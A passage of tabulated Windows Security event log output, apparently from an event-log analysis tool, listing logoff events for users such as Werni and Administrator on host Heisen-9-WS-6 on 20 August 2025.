&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; ProcessId: '0x608'               &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetUserName: Administrator    &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; ProcessName: C:\Windows\System   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; 32\svchost.exe                   &#9474;
&#9500;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9508;
&#9474; 2025-08-20 17:26:35 &#9474; &#8227; User Logoff Event                 &#9474; 1     &#9474; Microsoft-Windows-Security-Aud &#9474; 4634     &#9474; 3645      &#9474; Heisen-9-WS-6   &#9474; TargetUserName: Werni            &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474; iting                          &#9474;          &#9474;           &#9474;                 &#9474; LogonType: 2                     &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetUserSid: S-1-5-21-387158   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; 2759-1638593395-315824688-1002   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetDomainName: HEISEN-9-WS-   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; 6                                &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetLogonId: '0x1885ae'        &#9474;
&#9500;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9508;
&#9474; 2025-08-20 17:26:38 &#9474; &#8227; User Logoff Event                 &#9474; 1     &#9474; Microsoft-Windows-Security-Aud &#9474; 4634     &#9474; 3652      &#9474; Heisen-9-WS-6   &#9474; TargetUserName: Werni            &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474; iting                          &#9474;          &#9474;           &#9474;                 &#9474; LogonType: 2                     &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetUserSid: S-1-5-21-387158   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; 2759-1638593395-315824688-1002   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetDomainName: HEISEN-9-WS-   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; 6                                &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetLogonId: '0x188587'        &#9474;
&#9500;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9508;
&#9474; 2025-08-20 17:27:47 &#9474; &#8227; User Logoff Event                 &#9474; 1     &#9474; Microsoft-Windows-Security-Aud &#9474; 4634     &#9474; 3675      &#9474; Heisen-9-WS-6   &#9474; TargetUserName: UMFD-1           &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474; iting                          &#9474;          &#9474;           &#9474;                 &#9474; LogonType: 2                     &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetUserSid: S-1-5-96-0-1      &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetDomainName: Font Driver    &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; Host                             &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetLogonId: '0x9bdc'          &#9474;
&#9500;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9508;
&#9474; 2025-08-20 17:27:47 &#9474; &#8227; User Logoff Event                 &#9474; 1     &#9474; Microsoft-Windows-Security-Aud &#9474; 4634     &#9474; 3676      &#9474; Heisen-9-WS-6   &#9474; TargetUserName: DWM-1            &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474; iting                          &#9474;          &#9474;           &#9474;                 &#9474; LogonType: 2                     &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetUserSid: S-1-5-90-0-1      &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetDomainName: Window Manag   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; er                               &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetLogonId: '0xf339'          &#9474;
&#9500;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9508;
&#9474; 2025-08-20 17:27:47 &#9474; &#8227; User Logoff Event                 &#9474; 1     &#9474; Microsoft-Windows-Security-Aud &#9474; 4634     &#9474; 3677      &#9474; Heisen-9-WS-6   &#9474; TargetUserName: DWM-1            &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474; iting                          &#9474;          &#9474;           &#9474;                 &#9474; LogonType: 2                     &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetUserSid: S-1-5-90-0-1      &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetDomainName: Window Manag   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; er                               &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetLogonId: '0xf2fe'          &#9474;
&#9500;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9508;
&#9474; 2025-08-20 17:33:01 &#9474; &#8227; User Logoff Event                 &#9474; 1     &#9474; Microsoft-Windows-Security-Aud &#9474; 4634     &#9474; 3709      &#9474; Heisen-9-WS-6   &#9474; TargetUserName: Administrator    &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474; iting                          &#9474;          &#9474;           &#9474;                 &#9474; LogonType: 3                     &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetUserSid: S-1-5-21-387158   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; 2759-1638593395-315824688-500    &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetDomainName: HEISEN-9-WS-   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; 6                                &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetLogonId: '0x393ad'         &#9474;
&#9500;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9508;
&#9474; 2025-08-20 17:38:45 &#9474; &#8227; User Logoff Event                 &#9474; 1     &#9474; Microsoft-Windows-Security-Aud &#9474; 4647     &#9474; 3829      &#9474; Heisen-9-WS-6   &#9474; TargetUserName: Werni            &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474; iting                          &#9474;          &#9474;           &#9474;                 &#9474; TargetUserSid: S-1-5-21-387158   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; 2759-1638593395-315824688-1002   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetDomainName: HEISEN-9-WS-   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; 6                                &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetLogonId: '0x299ba4'        &#9474;
&#9500;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9508;
&#9474; 2025-08-20 17:38:50 &#9474; &#8227; User Logoff Event                 &#9474; 1     &#9474; Microsoft-Windows-Security-Aud &#9474; 4647     &#9474; 3835      &#9474; Heisen-9-WS-6   &#9474; TargetUserName: Administrator    &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474; iting                          &#9474;          &#9474;           &#9474;                 &#9474; TargetUserSid: S-1-5-21-387158   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; 2759-1638593395-315824688-500    &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetDomainName: HEISEN-9-WS-   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; 6                                &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetLogonId: '0x4804c'         &#9474;
&#9500;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9508;
&#9474; 2025-08-20 17:38:51 &#9474; &#8227; User Logoff Event                 &#9474; 1     &#9474; Microsoft-Windows-Security-Aud &#9474; 4634     &#9474; 3841      &#9474; Heisen-9-WS-6   &#9474; TargetUserName: UMFD-2           &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474; iting                          &#9474;          &#9474;           &#9474;                 &#9474; LogonType: 2                     &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetUserSid: S-1-5-96-0-2      &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetDomainName: Font Driver    &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; Host                             &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetLogonId: '0x3c9b2'         &#9474;
&#9500;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9508;
&#9474; 2025-08-20 17:38:51 &#9474; &#8227; User Logoff Event                 &#9474; 1     &#9474; Microsoft-Windows-Security-Aud &#9474; 4634     &#9474; 3842      &#9474; Heisen-9-WS-6   &#9474; TargetUserName: DWM-2            &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474; iting                          &#9474;          &#9474;           &#9474;                 &#9474; LogonType: 2                     &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetUserSid: S-1-5-90-0-2      &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetDomainName: Window Manag   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; er                               &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetLogonId: '0x3e93f'         &#9474;
&#9500;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#94